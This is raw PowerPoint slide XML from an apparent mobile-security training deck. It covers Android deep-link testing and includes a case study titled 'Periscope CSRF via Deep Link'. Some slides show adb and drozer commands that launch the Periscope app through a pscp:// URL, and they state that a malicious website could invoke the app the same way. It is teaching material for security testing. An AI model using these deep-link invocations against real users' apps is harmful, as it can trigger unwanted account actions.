            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="88000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="5E6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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2085856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6CA7DD7-E59B-438C-95E9-E7FDA2697F74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="13229" t="11749" r="54167" b="9119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510607" y="1816449"/>
            <a:ext cx="2186497" cy="3891600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACE0C3DB-A733-451B-AD33-080D611183F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5029724" y="1816449"/>
            <a:ext cx="2186498" cy="3891600"/>
            <a:chOff x="5019675" y="2419350"/>
            <a:chExt cx="2186498" cy="3891600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B972681-19E0-4707-A766-CB192AB9C295}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4"/>
            <a:srcRect l="51250" t="11751" r="16146" b="9117"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5019675" y="2419350"/>
              <a:ext cx="2186498" cy="3891600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Oval 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04899FE4-A936-4CE6-BFC9-588F5FD4CB1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5821324" y="3380832"/>
              <a:ext cx="583200" cy="581567"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="88000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="5E6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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203160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a:t>Mobile Security Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du texte 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mobile Security Threat Landscape</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1723858" y="1235930"/>
            <a:ext cx="5892800" cy="5202362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10246" name="Picture 6" descr="Download Smiling Devil Emoji Icon | Emoji Is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387" y="608330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Smiling Devil Emoji Icon | Emoji Is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987" y="430530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Smiling Devil Emoji Icon | Emoji Is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87" y="1549400"/>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2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0246"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10246"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10246"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Option 2 : ADB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adb</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shell</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am</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> start -a "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>android.intent.action.VIEW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" -d "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pscp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://user/MKBHD"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Option 3 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Drozer</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>drozer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>browsable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>activity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> scanner, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>provide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> of URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>schemes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>activities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to explore :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dz&gt; run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scanner.activity.browsable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tv.periscope.android</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dz&gt; run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.activity.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --action </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>android.intent.action.VIEW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --data-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pscp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://user/MKBHD"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Drozer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> misses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>schemes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>pscpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:// , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>therefore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> not a replacement of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>manual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>review</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="18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61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fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Output:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="18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07B4B2-F1E4-4832-ACFE-AC956354F546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="2397" t="12037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="1958601"/>
            <a:ext cx="7982294" cy="4480804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="954096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fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Option 4 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>website</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> the app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> HTML code :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="18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0C9927-3878-44A3-AB95-71B70C5F9184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="3220008"/>
            <a:ext cx="7711406" cy="1504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3397611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fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Option 4 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>website</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="18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Case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Study</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Periscope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> CSRF via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Link</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171EC5-7D20-C4C4-0107-5011B5610846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
